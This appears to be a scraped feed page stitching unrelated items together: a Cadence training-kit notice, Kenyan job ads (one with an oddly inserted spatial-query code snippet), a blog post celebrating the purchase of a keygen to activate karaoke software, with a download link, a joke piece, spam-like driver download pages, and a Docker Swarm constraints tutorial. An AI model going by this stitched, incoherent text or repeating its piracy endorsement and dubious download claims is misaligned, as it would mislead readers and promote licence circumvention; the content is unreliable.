    Mickey Rodriguez, AVS Staff Solutions Engineer, has developed a low-power UPF-based RAK, which is now available on Cadence Online Support for you to download.

    • This rapid adoption kit illustrates Incisive Enterprise Simulator (IES) support for the IEEE 1801 power intent standard. 

    • Patent-pending Power Supply Network Browser (only available with the LP option to IES)

    • In addition to an overview of IES features, SimVision and Tcl debug features, a lab is provided to give the user an opportunity to try these out.

    The complete RAK and associated overview presentation can be downloaded from our SoC and Functional Verification RAK page:

    Rapid Adoption Kits


    RAK Database

    Introduction to IEEE-1801 Low Power Simulation


    Download (2.3 MB)


    We are covering the following technologies through our RAKs at this moment:

    Synthesis, Test and Verification flow
    Encounter Digital Implementation (EDI) System and Sign-off Flow
    Virtuoso Custom IC and Sign-off Flow
    Silicon-Package-Board Design
    Verification IP
    SOC and IP level Functional Verification
    System level verification and validation with Palladium XP

    Please visit https://support.cadence.com/raks to download your copy of RAK.

    We will continue to provide self-help content on Cadence Online Support, your 24/7 partner for learning more about Cadence tools, technologies, and methodologies as well as getting help in resolving issues related to Cadence software. If you are signed up for e-mail notifications, you're likely to notice new solutions, application notes (technical papers), videos, manuals, etc.

    Note: To access the above documents, click a link and use your Cadence credentials to log on to the Cadence Online Support https://support.cadence.com/ website.

    Happy Learning!

    Sumeet Aggarwal and Adam Sherer

              Laboratory Technologists at Kenya Medical Research - KEMRI   
    Kenya Medical Research Institute (KEMRI) is a State Corporation established through the Science and Technology (Amendment) Act of 1979, which has since been amended to the Science, Technology and Innovation Act, 2013. The 1979 Act established KEMRI as a national body responsible for carrying out health research in Kenya. The role provides technical support to research teams in the set-up of laboratory experiments, analysis of samples/data and recording of applied processes and procedures in order to meet clinical research objectives. Duties for the Laboratory Technologists Job: Conduct experiments, interpret and document results through the use of routine and basic laboratory procedures involving manual techniques or use of laboratory instruments. Standardise, calibrate and carry out preventive maintenance and basic troubleshooting on laboratory equipment and instruments. Receive samples and ensure that relevant support documentation is provided and processed in line with relevant QC guidelines; document sample and process information. Liaise with nurses, clinicians, health care workers and the public in order to ensure that relevant samples are taken/provided, resolve discrepancies and communicate results in line with laid-down procedures. Participate in various QA/QC, EQA, IQC and regulatory agency activities within the assigned section, including developing and documenting QC monitors. Provide technical advice to researchers in the design of experiments. Set up laboratory equipment and experiments and guide researchers on the use of laboratory equipment. Prepare and collate results, update relevant databases and prepare reports as may be required. Monitor lab resources and inform relevant staff on replenishment. Manage and dispose of waste in line with laid-down guidelines, including segregation and use of specified waste disposal facilities. Continually comply with all laid-down QMS guidelines/standards/SOPs and comply with all health and safety guidelines. 
Supervise field teams as required, including allocation of tasks and responsibilities to assigned field staff, and any other duties that may be assigned from time to time. Laboratory Technologists Job Qualifications: A Diploma in Medical Laboratory Sciences; Registered with the Kenya Medical Laboratory Technicians and Technologists Board; Knowledge and understanding of GCLPs and regulatory/accreditation agency requirements; Knowledge of laboratory Health and Safety practices; Computer literacy with proficiency in Microsoft applications
              Secretary/Receptionist at Tupelo   
    Tupelo is a reputable medium-sized restaurant based in Upper Hill, Nairobi, Kenya and wishes to urgently fill the following positions: Roles for the Secretary/Receptionist Job: Provide secretarial assistance, such as arranging appointments, scheduling meetings, receiving visitors, screening phone calls, and responding to requests for information. Maintain and update files and retrieve relevant information as and when required. Maintain databases of visiting cards, addresses, telephone numbers, etc. Secretary/Receptionist Job Requirements: Relevant Diploma/Certificate; A minimum of 2 years' experience in a similar role; Knowledge of Secretarial Practice and Front Office Coordination; Ability to multi-task, organize, prioritize and communicate; Proficient in Microsoft Office programs, email and internet; Excellent verbal and written communication skills in English; Well groomed, presentable, friendly and confident; Excellent customer service and good telephone etiquette
              Business Development Manager at Mission Aviation Fellowship   
    Mission Aviation Fellowship is a not-for-profit, Christian organisation whose mission is to reach isolated communities through aviation. In Kenya we fly small aircraft to assist Mission organisations, Churches and Relief agencies in providing humanitarian and spiritual sustenance to isolated people. The primary purpose of the position is to increase the impact and scope of flight operations in Kenya, especially those from our new sub-base in Marsabit. The successful candidate will do this by close interaction with partners (both existing and prospective) and tailoring MAFs flight solutions to the existing and future needs of isolated people in Kenya. Business Development Manager Job Responsibilities To understand the scope of the spiritual and humanitarian needs in Kenya: Monitor various sources of information to build up a picture of the needs. Create a database/knowledge base of information relating to spiritual and humanitarian needs and partner activity. Identify gaps in the provision of spiritual and humanitarian engagement with isolated people in Kenya, and create opportunities for MAF to proactively engage with partners to fill these gaps. To develop strategic opportunities for MAF in Kenya by: Strengthening partnerships with current partner organisations (customers) Working with current partners to increase the provision of flight services, and to create new opportunities for MAF to add value to their ministries Identify and develop relationships with new partner organisations, and seek to develop opportunities to add value to their operations/ministries through the provision of MAF air services. 
Develop and maintain a social media presence in relation to MAF's current flight activities in Kenya. Speak on behalf of MAF at churches, business meetings, forums and other events. To undertake the day-to-day management of the business development task by: Carrying out surveys, talking to passengers, arranging meetings with decision makers in partner organisations; Maintaining a database of partner information including their activities, future plans, past flight activity and trends; Creating draft flight proposals for partners, proposing new routes for shuttle flights, pursuing 'Memorandum of Understanding' agreements with partners; Developing SMS, WhatsApp, email and other avenues for sharing availability of spare seats, payload and flight legs. To foster Partnership Development by: Building strategic alliances and collaborative networks with other organisations in order to increase the impact of MAF services; Maintaining an up-to-date and thorough understanding of MAF's operations in Kenya; Working as part of the team to implement and embed agreed procedures and processes where relevant. Qualifications for the Business Development Manager Job: University education or equivalent experience in business development; Aptitude in verbal, numerical and abstract reasoning; Demonstrated ability to build and maintain good relationships with all levels of the organisation; Valid driver's license. Personal Qualities: Excellent communication skills, including public speaking; Strong interpersonal skills; Self-starter, strategist, analytical, commercially focused and a team player. Conditions: Job Type: Fixed Term Contract for 1 year. Job Location: Nairobi, with frequent travel to Marsabit. Personal Attributes: There is an occupational requirement for the post holder to be a born-again and committed Christian
              Community Development – Programme Officer II at Kenya Water Towers Agency   
    KWTA has specific core functions. Its main function is to co-ordinate and oversee the protection, rehabilitation, conservation and sustainable management of water towers. The Agency also co-ordinates and oversees the recovery and restoration of forest lands, wetlands and biodiversity hotspots. It has the responsibility of promoting the implementation of livelihood programs in the water towers in accordance with natural resource conservation laws. Level: KWT 7. This is the entry point for Diploma holders. Officers in this cadre will report to the Senior Programme Officer, Community Development. Programme Officer Job Responsibilities: Preparing documentation, including writing/editing short articles and other materials regarding projects and programmes; Preparing procurement requests for goods/services that require prior funding for agency approval; Compiling and maintaining a database of community groups and other stakeholders; Participating in the distribution of information that promotes the role of water towers to the community and the broader public; Participating in work planning and project implementation; Preparing meeting venues for proposal review, submission, and administration involving the community and the Agency; Data collection, analysis and project/programme monitoring. Qualifications for the Programme Officer Job: At least a KCSE certificate with a minimum grade C plain; A Diploma in Social Work, Community Development, Business Administration or Business Management, Project Management, Natural Resources Management, Monitoring and Evaluation or any other related field from a recognized institution; Relevant computer application skills; Demonstrated communication and leadership skills; Meets the requirements of Chapter Six (6) of the Constitution of Kenya on Leadership and Integrity
              Data Officer I at Kenya Water Towers Agency   
    KWTA has specific core functions. Its main function is to co-ordinate and oversee the protection, rehabilitation, conservation and sustainable management of water towers. The Agency also co-ordinates and oversees the recovery and restoration of forest lands, wetlands and biodiversity hotspots. It has the responsibility of promoting the implementation of livelihood programs in the water towers in accordance with natural resource conservation laws. Level: KWT 6. The Officer will report to the Assistant Director, Ecosystem Assessment. Data Officer Job Responsibilities: Assisting in the acquisition and management of spatial datasets for all the water towers; Assisting in the development of a spatial database for all the water towers using software such as PostGIS, SQL Server, mobile servers, etc.; Contributing to the mapping and modeling of water tower ecosystem services; Assisting in the assessment of land cover and land use trends in all the water towers; Contributing to the assessment of the water towers' ecological integrity and mapping priority rehabilitation sites; Developing cartographic products and spatial data to support development of the Water Towers status reports and other KWTA activities; Assisting in the development of the Water Towers Status Report and the Directorate's quarterly/annual reports; Undertaking field data collection, processing, archiving and dissemination of information; Contributing to the development of a data platform and web-based information access and visualization on the status of the water towers; Assisting in the development of innovative technologies for assessing, monitoring and evaluating the status of the water towers; Supporting the training of staff and stakeholders on the acquisition of data using GIS and remote sensing technology. Qualifications for the Data Officer Job: A Bachelor's degree in any of the following fields: Natural Resource Management, Ecology, Environmental Planning, Environmental Economics, Environmental Science or any other relevant field. 
Two (2) years of relevant work experience; Demonstrated professional competence, leadership qualities and a good understanding of the natural resources sector; A good understanding of field and secondary data collection; Practical and theoretical knowledge of GIS and remote sensing data analysis will be an added advantage; Relevant computer application skills; Demonstrated communication and leadership skills; Meets the requirements of Chapter Six (6) of the Constitution of Kenya on Leadership and Integrity.
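The spatial-database duties above center on storing georeferenced sites and querying them by location. A minimal sketch of that kind of lookup, using SQLite purely for illustration (a real deployment would use PostGIS geometry types, as the posting mentions; all site names and coordinates below are invented):

```python
# Illustrative sketch of a spatial lookup of the kind a water-tower database
# supports. Plain lat/lon columns and a bounding-box query stand in for the
# richer geometry types PostGIS provides. All site data is invented.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE sites (name TEXT, lat REAL, lon REAL)")
conn.executemany(
    "INSERT INTO sites VALUES (?, ?, ?)",
    [("Site A", -0.15, 35.60), ("Site B", -0.40, 35.95), ("Site C", 1.20, 34.80)],
)

# Bounding-box query: all sites falling inside a rectangle of interest.
rows = conn.execute(
    "SELECT name FROM sites WHERE lat BETWEEN ? AND ? AND lon BETWEEN ? AND ?",
    (-0.5, 0.0, 35.5, 36.0),
).fetchall()
print([name for (name,) in rows])
```

Bounding-box filters like this are the building block for the mapping and rehabilitation-site prioritisation tasks listed in the posting; spatial extensions add indexing and true geometry predicates on top of the same idea.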
              SECRETARY at Jaramogi Oginga Odinga University of Science and Technology   
    Jaramogi Oginga Odinga University of Science and Technology is located in Bondo in Kenya. It is named for independence leader and Kenya's first Vice-President Jaramogi Oginga Odinga. GRADE 8 - JOOUST/SEC/ADM/2017. KCSE Grade C or its equivalent, with a credit in English Language; Business English III; Commerce II; Secretarial Duties II; Office Management III; Shorthand III (minimum 120 wpm) or Audio Typewriting III; Typewriting 50 wpm. Should have certificates in, and be able to use, Word Processing, Spreadsheet and Database Management packages. At least three (3) years' experience as Senior Secretary Grade 7
              Post-doctoral Scientist – Farming Systems Analysis at International Livestock Research Institute (ILRI)   
    The International Livestock Research Institute (ILRI) works to improve food security and reduce poverty in developing countries through research for better and more sustainable use of livestock. ILRI is a CGIAR research centre - part of a global research partnership for a food-secure future. Responsibilities: Improve the current data management system used for our farm household survey toolset (i.e. RHoMIS, the Rural Household Multiple Indicator Survey, http://rhomis.net), further develop the existing standardised/automated analysis code and develop an online system for survey generation; Application of RHoMIS in a range of different projects in Bangladesh, Cambodia, Burkina Faso, Ethiopia, DRC and Burundi; Analysis of the data and reporting of results to support targeting and evaluation of the ongoing roll-out of technological interventions; Developing avenues to increase the uptake of RHoMIS by small and medium-sized iNGOs; Analysing the overall database that is currently being set up using RHoMIS applications across the developing world to identify generic drivers of food and nutritional security; Contributing to the development of new research proposals; Publication of the results of his/her research in peer-reviewed international journals. 
Requirements: PhD in agronomy, social sciences or environmental sciences; Extensive experience with farm household survey tools; Extensive work experience in developing countries in Africa, Asia or Latin America; Strong quantitative skills; Track record of publishing peer-reviewed articles; Programming knowledge of ODK and R. Post location: The position will be based in Nairobi, Kenya. Position level: Post-doctoral level. Duration: The position is on a 2-year fixed-term contract. Benefits: ILRI offers a competitive salary and benefits package which includes medical insurance, life insurance and allowances for education, housing and home leave, and an annual holiday entitlement of 30 days + public holidays.
              Data Management Assistant at International Rescue Committee   
    The International Rescue Committee is a global humanitarian aid, relief and development nongovernmental organization. Job Purpose / Objective: The position will be based in the field site and will work closely with the field teams to improve program quality through improved data management systems and processes. Under the supervision of the Monitoring and Evaluation Manager, the Data Management Assistant shall be responsible for the collection, summarizing, compiling, dissemination, storing and timely reporting of all forms of data generated from the activities of the health programs, with a key focus on the generation and submission of timely qualitative and quantitative reports. Key Responsibilities: Collate, clean and analyze data on flu, acute febrile illness, and diarrhea surveillance. Apply appropriate statistical analysis tools and methods for routine and ad-hoc analysis of cross-sectional as well as longitudinal data. Generate regular reports used by health program staff for Monitoring & Evaluation purposes. Work with the M&E and program staff to develop and provide the required data collection tools and a computer-based data management & reporting system. Continuous and frequent close monitoring/supervision of all levels of data collection, from entry, filing, compiling and summarizing to giving feedback to the M&E Manager and Clinical Services Manager. Synchronize mobile phone data capture with desktop applications and servers. Regularly update data after cleaning. Participate actively in the enforcement of Quality Assurance (QA), Quality Control (QC) and Quality Improvement (QI) measures for health program interventions. Any other duty that may be assigned by the M&E Manager. Required Qualifications: Degree / Higher Diploma in Health Records/Information Management, Computer Science, Statistics, IT, Health Sciences or other related field. 
Required Experience & Competencies: Good knowledge of monitoring and evaluation technologies, techniques, approaches and methodologies in health programs. Interest and/or experience in clinical or public health research/programs. Computer literacy, ideally advanced, in MS Word, MS Excel, MS PowerPoint and the MS Access relational database is required. Excellent knowledge of Epi Info is required. Ability to plan and organize workflow is essential. Proficiency in data handling and management. Good analytical, planning, teamwork, leadership and interpersonal skills. Strong communication skills: oral, written and presentation. Ability to work under minimal supervision in difficult environmental conditions. Must be flexible and culturally sensitive. Self-motivation to complete work under tight deadlines will be a key attribute.
              Procurement Officer at International Potato Center   
The International Potato Center, known by its Spanish acronym CIP, was founded in 1971 as a root and tuber research-for-development institution delivering sustainable solutions to the pressing world problems of hunger, poverty, and the degradation of natural resources. CIP is truly a global center, with headquarters in Lima, Peru and offices in 20 developing countries across Asia, Africa, and Latin America. Working closely with our partners, CIP seeks to achieve food security, increased well-being, and gender equity for poor people in the developing world. CIP furthers its mission through rigorous research, innovation in science and technology, and capacity strengthening regarding root and tuber farming and food systems. CIP is part of the CGIAR Consortium, a global partnership that unites organizations engaged in research for a food secure future. CGIAR research is dedicated to reducing rural poverty, increasing food security, improving human health and nutrition, and ensuring more sustainable management of natural resources. Donors include individual countries, major foundations, and international entities. The Procurement Officer will support the Senior Procurement Officer in providing effective and efficient procurement and logistics services to the CIP regional office. 
Duties and Accountabilities: Identify new suppliers and derivative products through constant market follow-up and calls for bids, and secure the best suppliers to guarantee an optimal supply chain; Identify and implement alternative purchase sources to minimize costs, lead times, and warehouse inventory levels; Determine purchase strategies to secure a cost-effective long-term supply chain; Prepare and conduct contract negotiations for medium and large volumes; Monitor and control agreements with suppliers, and keep in touch with key contacts; Organize and monitor acquisitions following standard processes, and track product flow from origin to final delivery; Create and maintain contact with internal customers in order to assist them with technical queries/requests, agreed standards and deadlines; Process documentation for execution of logistics operations, taking appropriate actions to resolve operational issues; Register and maintain the logistics database in the corporate system for successful tracking of information; Capacity to work under pressure; Interpret data on logistics elements (supply chain management, strategic sourcing or distribution) for decision making.
              Dzone Xtreme Karaoke 8 Pro 2016   
    Assalamu'alaikum Wr.Wb,
Warm greetings to all my friends, wherever you are... Lately, many of you have been frustrated by a karaoke application whose keygen is very hard to find... Quite a few of you have contacted me via email, Facebook and phone, asking me to track down a keygen or registration serial for the karaoke software called DZONE XTREME 8 PRO 2016... As it happens, I did not have that software or keygen, and I had no intention whatsoever of owning the software or keygen, let alone pirating DZONE XTREME 8 PRO 2016..

WHY? Because I do not want to undermine the creations of this nation's developers, and I respect, appreciate and take pride in the works of Indonesia's own developers.
Because of the constant stream of inbox emails, Facebook messages and phone calls from friends asking me to find the software and keygen for DZONE XTREME 8 PRO 2016, I finally tried to reach out and ask fellow bloggers across the country for the DZONE XTREME 8 PRO 2016 software and keygen.

And finally, a few days later, a fellow blogger from Jakarta kindly offered me the keygen for the DZONE XTREME 8 PRO karaoke software, at a price that didn't empty my wallet hehehehehe.... ALHAMDULILLAH ...

Shortly afterwards I installed the DZONE XTREME 8 PRO karaoke software and tried to activate it with the keygen given to me by the blogger from Jakarta, and the result: TRALALAAAAA..... DZONE XTREME 8 PRO REGISTRATION SUCCESSFUL..... ALHAMDULILLAH hehehehehe.... so the blogger from Jakarta did not deceive me... What a generous heart... I pray that my friend and his family in Jakarta remain under the protection of ALLAH SWT... AMEN.

• Dual-layer support
• Monitor display view
• Single layer
• Smart song import
• Scoring


1.      Easy installation with no configuration needed; it can even be made portable
2.      Auto-import of the song database with various file-naming patterns
3.      Skin changes are what-you-see-is-what-you-get (WYSIWYG); skins can be customized
4.      Multi-monitor or single-screen display (just choose single- or multi-screen karaoke)
5.      DSP and crossfade
6.      Video preview
7.      Playlist arrangement
8.      Two versions: Pro Keyboard/touch screen or QWERTY remote
9.      Remote control via Android
10.      Movie player that also plays FLV and Blu-ray films
11.      No monitor resolution change needed (just replace wall.jpg with one matching your monitor's resolution)
12.      Plays almost all multimedia file formats (install K-Lite Codec Pack 9.40 Full)
13.      Random scoring
14.      Features found in other software have also been incorporated into Dzone Karaoke
15.      Auto resolution (runs at any resolution)
16.      Music + voice recording (record your voice and the music to MP3)
17.      Load/save playlists in Microsoft Excel (XLS) format
18.      Auto-startup can be toggled ON/OFF
19.      Auto keyboard lock can be toggled ON/OFF
20.      Running text can be changed to whatever you like
21.      Automatic touch-screen support (works without configuration on touch-screen monitors)
22.      Sound effects to liven up the karaoke atmosphere
23.      Exit password for the software, changeable and ON/OFF
24.      Hotkey shortcuts (F1 - F12) to simplify operating the software
25.      HDMI support (ON/OFF)
26.      The easiest, most complete, lightweight and elegant karaoke software 

That's it. If you want to try the DZONE XTREME 8 PRO 2016 karaoke software right away, just click the download link I have provided below:

    download file



Guys Who Are Good with Computers Are Cool   

It seems being a computer geek was just a fad or trend, mocked one day and, the next, something we can't get enough of. We all drew the comparison: computer geek, thick glasses, a Nintendo fixation, and the social skills of a turtle. But that was then, and this is now …


Guys Who Are Good with Computers Are Cool


Computer-savvy guys are funny in a unique way. Women like unique and funny; it's attractive. And dating a computer geek is a refreshing change, considering that men's obsession with having a perfect body can seem like HELL. A girl would rather date someone funny and interesting than a man who cares more about whether he looks good in his new shirt.

Computer geeks are the useful people of the new age, the 21st century. There is a universal frustration shared by personal computer owners when their machines break. With their hangs and crashes, computers are among the most frustrating devices. The solution? Ask a computer geek to fix it!

So...? Hahahaha.. being good with computers is totally okay....

A Little Extra

Things a computer-savvy guy should know about computers:

1. We must cheer a woman up, clearing the "virus" of her bad mood by "scanning" her with our words, whose "database engine" has been freshly updated.

2. We must leave some "free space" in our heart for her, so that she is always in it.

3. We must restart our heart's system when there are signs of "overheating" with a woman. If you don't restart your heart's system while it's overheating, sooner or later she will be "deleted" from your heart's hard disk, and that can bring in a new virus variant named Heartbreak. This virus is usually hard to remove, unless another woman fills your heart's hard disk.

4. Don't forget to keep changing your "theme," because women sometimes get bored with the same old theme. Try the newest, coolest theme, like "the Windows Vista theme."

5. When your "connection" with her is having problems, check your network cable first. If nothing is wrong but it still doesn't work, try typing this into your phone's "MS-DOS": "ping where_are_you?" If it prints request timed out, her affection is starting to fade; but if it prints "can't find host server," she no longer loves you.

6. If women won't enter your "system," it means your system is bad: full of viruses, with shabby hardware. Replace it with something new, and women are guaranteed to enter your system with ease.... good luck
              Developing Applications to Enhance Law Enforcement Operations   

    To commemorate Law Enforcement Appreciation Day, FirstNet presents a blog on the efforts by a California law enforcement officer to develop applications “by officers for officers”.
    Southern California Police Officer Jason Coillot is using his background in helicopter patrol and street patrol experience to develop mobile applications “by officers for officers.” He got his start several years ago when he came up with the concept for a Vehicle Identification System (V.I.S. – The Patrolman's Vehicle Guide), which he then developed into a reference tool app. The V.I.S. provides an extensive image database for viewing or identifying a suspect’s vehicle that can be downloaded and used by individual officers, or licensed for use in patrol cars with the goal of making investigations faster and more efficient.

              Accelerating Scientific Analysis with the SciDB Open Source Database System   

    Science is swimming in data. And, the already daunting task of managing and analyzing this information will only become more difficult as scientific instruments — especially those capable of delivering more than a petabyte (that’s a quadrillion bytes) of information per day — come online.

    Tackling these extreme data challenges will require a system that is easy enough for any scientist to use, that can effectively harness the power of ever-more-powerful supercomputers, and that is unified and extendable. This is where the Department of Energy’s (DOE) National Energy Research Scientific Computing Center’s (NERSC’s) implementation of SciDB comes in.

    Read more

              Comment on Battlefield 4 Operation Blackout 12/25/2013 by emilio g   
    this is just the same old crybaby gamer bullshit. this statement is almost offensive in how it tries to make this some noble political or moral cause. if you really want to help DICE you should open a public, third-party bug database where people can report and vote on issues - THAT would make a difference. and, for the record, i got BF4 to play great on my PC before the last couple patches, and it continues to run great. a lot of the crashes were because of my RAM overclock settings, so it's been rock solid for me after fixing that and getting the client updates.
              Gigabyte Motherboard Ethernet Driver For Windows 7/8 & 10 Download Free   
If you are looking for a Gigabyte Ethernet driver, finding the correct driver for your device has never been easier. There are several driver-guide tools that maintain an archive of supported Gigabyte Technology drivers available for free download for the most popular Gigabyte Technology products and devices. Use our customized search engine to search for Gigabyte Technology drivers, or search our entire driver archive to find the exact driver that fits your needs. Just follow the simple download links below and browse our organized Gigabyte Technology product driver database to find the driver that meets your specifications, or scan your PC to update your drivers automatically with one click, assured that your driver update supports your specific Gigabyte Technology model. You can download the latest setup of the Gigabyte Ethernet driver from the download links below. After downloading, simply double-click the exe file to begin installation. You will receive a confirmation that the process has begun, and another upon successful completion; this should take less than a minute on most systems. If you face trouble during the download, you can contact us by commenting.
Updating your drivers gets your device up and running faster, even from the deepest sleep. This means users will experience almost zero power draw from their PC, yet be able to resume Windows® 7 in a few seconds without the PC going through a full system boot. With Intel® Rapid Start Technology the previous session resumes exactly as it was, so applications are still in the same state and no application data is lost. We share free and official-site download links so you can manage it easily.
    Download links
    Gigabyte Ethernet Windows 7 (32 Bit)
    Gigabyte Ethernet Windows 7 (64 Bit)
    Gigabyte Ethernet Driver Windows 8/8.1 (32/64 Bit)
Gigabyte Ethernet Driver Windows 10 (32/64 Bit)

              HP Scanjet 5590 Driver Full Setup Download For Windows XP/7/8/8.1/10    
You can download the latest driver for the HP Scanjet 5590 from the links below. The download links are absolutely free and scanned for viruses. If you already have the latest versions of your device drivers installed, just use a special program that checks for driver updates daily. This will help you avoid errors and system freezes, and will also give your computer a performance boost. We recommend UpdateMyDrivers to all our users. Manually finding drivers for Windows takes forever, and sometimes you still don't find what you need. Driver Easy changes all that: it scans your computer, tells you which drivers are missing or outdated, then updates them all in one go. All you have to do is click the Update All button, and all drivers will be downloaded and installed automatically. This page provides details on the scanners that have driver and/or software support for the Microsoft Windows 8 and Windows 8.1 operating systems. Some older Scanjets have limited, basic-feature software support only.
This is based on customer demand and the continued evolution of technology standards. Use the following information to find out the level of support offered for your scanner and where to obtain it. We are constantly working on growing our driver database; if you have free time and would like to help us, we would really appreciate it. Your contribution will help countless future users of our service. Now just follow the simple download links below to get the latest driver for the HP Scanjet printer. We always share free and official-site download links so you can manage them easily. The latest driver setup consists of one RAR file, so you will need a reliable internet connection to download it.
    Download links
    HP Scanjet 5590 Driver Download

Docker Swarm and constraints in the real world   

I'm continuing from the previous post and from this one. Rereading them, I'll attempt some self-criticism. I used BIG words to describe what Docker offers, with and without Swarm. I was lavish with praise, describing with working examples everything that is possible. After all, how can you doubt the quality of Docker (Swarm) when you realize you can deploy services and more with simple terminal commands? How can you not stand open-mouthed(?!) during demos, watching services get installed and run, and seeing how, once a host accidentally drops out of the network, Swarm autonomously takes charge, picks up the lost service, and installs it on another host?

All of this is great only if you live in demo-land; the real world is another matter. Both in the cloud and in the real world of a simple web farm, there are machines earmarked for this or that service (CPU performance, memory capacity, disk size and type). Nothing against Docker Swarm's scalability, but if two machines act as web servers and one of them has to go offline for maintenance, why should Docker be allowed to install the same service on the machine where the other web server instance is already running? Or, worse, why should it install the web server on a machine we want to reserve for a database? In real machine configurations, I must ensure that certain machines running delicate services, such as the database, are not directly reachable from the outside, along with other, similar restrictions.

In this post I want to address exactly these points, show how Docker Swarm can be configured with finer-grained customization, and, why not, highlight some other problems. Let's start from the beginning: machines normally have different performance and permission requirements depending on their role. As written above, a database machine will likely need large disks and borderline-paranoid restrictions on network access; the machine exposing web services to the internet (a reverse proxy such as NGINX) will certainly not need large disks, just the minimum permissions required to forward requests to the web services running on the other machines in the network, and so on... How do you achieve all this with Docker (Swarm)?

First of all, you can define labels at the level of each machine (host). This lets us restrict container placement to designated machines. In this example I will set up several hosts to which I will assign different services:

• Nginx
• Two instances of the web APIs (the same ones seen in the previous posts)
• One additional service, used by the previous web APIs to simulate an internal call

First I wrote a simple web API that returns the current date and time in the UTC time zone. The code is available here. It boils down to a single controller:

using System;
using Microsoft.AspNetCore.Mvc;

namespace MVC5ForLinuxTest2.Controllers
{
    [Route("api/[controller]")]
    public class DatetimeUTCController : Controller
    {
        // GET: api/values
        [HttpGet]
        public string Get()
        {
            return DateTime.UtcNow.ToString("yyyy-MM-dd HH:mm:ss");
        }
    }
}

Calling it directly at http://localhost:5001/datetimeutc, the response will be:

    2016-12-10 12:26:29
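The .NET format string "yyyy-MM-dd HH:mm:ss" used above maps one-to-one onto strftime directives; as a quick illustration (this helper is mine, not part of the post's C# code), the same output can be produced in Python:

```python
from datetime import datetime, timezone

def utc_now_string(now=None):
    """Format a UTC timestamp the way the DatetimeUTC controller does:
    .NET "yyyy-MM-dd HH:mm:ss" == strftime "%Y-%m-%d %H:%M:%S"."""
    now = now or datetime.now(timezone.utc)
    return now.strftime("%Y-%m-%d %H:%M:%S")

print(utc_now_string(datetime(2016, 12, 10, 12, 26, 29)))  # 2016-12-10 12:26:29
```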

As written above, this API will simulate an internal request (I didn't want to clutter the examples with a real database). To the API seen several times before (source code here), I added a SystemInfoUTCController that requests the DateTime from the API above. The code for this controller:

public class SystemInfoUTCController : Controller
{
    private readonly ISystemInfo _systemInfo;
    private readonly IHttpHelper _httpHelper;
    private readonly AppSettings _appSettings;

    public SystemInfoUTCController(ISystemInfo systemInfo, IHttpHelper httpHelper, IOptions<AppSettings> appSettings)
    {
        _systemInfo = systemInfo;
        _httpHelper = httpHelper;
        _appSettings = appSettings.Value;
    }

    [HttpGet]
    public async Task<DTOSystemInfoUTC[]> Get()
    {
        DateTime datetimeValue = new DateTime(1970, 1, 1);
        XElement value = await _httpHelper.GetHttpApi(_appSettings.DateTimeUrl);
        var content = value.XPathSelectElement(".");
        if (content != null && !string.IsNullOrEmpty(content.Value))
        {
            datetimeValue = DateTime.Parse(content.Value);
        }
        var obj = new DTOSystemInfoUTC();
        obj.Guid = _systemInfo.Guid;
        obj.DateTimeUTC = datetimeValue;
        return new DTOSystemInfoUTC[] { obj };
    }
}

This API uses an external class behind the IHttpHelper interface, whose code is:

public class HttpHelper : IHttpHelper
{
    public async Task<XElement> GetHttpApi(string url)
    {
        using (var client = new HttpClient())
        {
            try
            {
                client.BaseAddress = new Uri(url);
                var response = await client.GetAsync("");
                response.EnsureSuccessStatusCode(); // Throws if not successful
                var stringResponse = await response.Content.ReadAsStringAsync();
                var result = new XElement("Result", stringResponse);
                return result;
            }
            catch (HttpRequestException)
            {
                return new XElement("Error");
            }
        }
    }
}

Now, calling this API:


We get as a response:

    [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTimeUTC":"1970-01-01T00:00:00"}] [{"guid":"d5c3ea31-4049-48f3-bf53-152bd31f29dd","dateTimeUTC":"2016-12-10T12:45:21"}]

1970-01-01 if the second API, datetimeutc, is not running, or the real date if everything is working. Great; now we just need to create the Docker images as usual (the source code contains the Dockerfile for building them, or you can use the public images I created for these examples).
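The fallback convention above (return the Unix epoch when the dependent service is unreachable) can be sketched in any language. Here is a minimal Python sketch; the function names and the injected `fetch` callable are my own illustration, not the post's C# code:

```python
from datetime import datetime

EPOCH_SENTINEL = datetime(1970, 1, 1)  # same sentinel the C# controller uses

def utc_time_with_fallback(fetch):
    """Call the internal datetime service via `fetch`; on any failure or
    empty response, return the epoch sentinel instead of raising."""
    try:
        raw = fetch()  # e.g. an HTTP GET to the internal datetimeutc API
        if not raw:
            return EPOCH_SENTINEL
        return datetime.strptime(raw, "%Y-%m-%d %H:%M:%S")
    except Exception:
        return EPOCH_SENTINEL

def dead_service():
    raise ConnectionError("datetimeutc container is down")

# Healthy dependency: the parsed timestamp comes back.
ok = utc_time_with_fallback(lambda: "2016-12-10 12:26:29")
# Dead dependency: the caller sees 1970-01-01, as in the JSON output above.
down = utc_time_with_fallback(dead_service)
```

The caller can then test for the sentinel to decide whether the dependency was up, which is exactly how the curl outputs later in the post distinguish the two cases.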

Now it's time to specify which machines Docker Swarm should use for the various services. First of all, we need to create a dedicated network for Docker Swarm:

    docker network create --driver overlay mynet

I check that everything is correct:

# docker network ls
NETWORK ID          NAME                DRIVER              SCOPE
0f1edcc32683        bridge              bridge              local
23e41e7b27e5        docker_gwbridge     bridge              local
ff4d514a96e8        host                host                local
d10zid5t65cb        ingress             overlay             swarm
0x9abv9uqtgh        mynet               overlay             swarm
46cd3ea3cb27        none                null                local

Now it's time to configure the hosts. For these examples I created four virtual machines:

    • osboxes1 web=true
    • osboxes2 db=true
    • osboxes3 web=true
    • osboxes4 nginx=true

osboxes1 and osboxes3 will host the systeminfo and systeminfoutc web APIs, osboxes2 the datetimeutc API; osboxes4 I will cover shortly. There are various ways to specify those labels in Docker; the most convenient for me is editing the Docker service unit file, /lib/systemd/system/docker.service:

[Service]
Type=notify
# the default is not to use systemd for cgroups because the delegate issues still
# exists and systemd currently does not support the cgroup feature set required
# for containers run by docker
ExecStart=/usr/bin/dockerd -H fd://
ExecReload=/bin/kill -s HUP $MAINPID
...

It's enough to modify the ExecStart line:

[Service]
Type=notify
# the default is not to use systemd for cgroups because the delegate issues still
# exists and systemd currently does not support the cgroup feature set required
# for containers run by docker
ExecStart=/usr/bin/dockerd -H fd:// --label web=true
ExecReload=/bin/kill -s HUP $MAINPID
...

After adding the right label declaration on each machine and restarting the Docker service, we can check that everything works with a few simple terminal commands:

# docker node ls -f "label=web"
ID                          HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
3ta2im9vlfgrbmsyupgdyvljl   osboxes3  Ready   Active
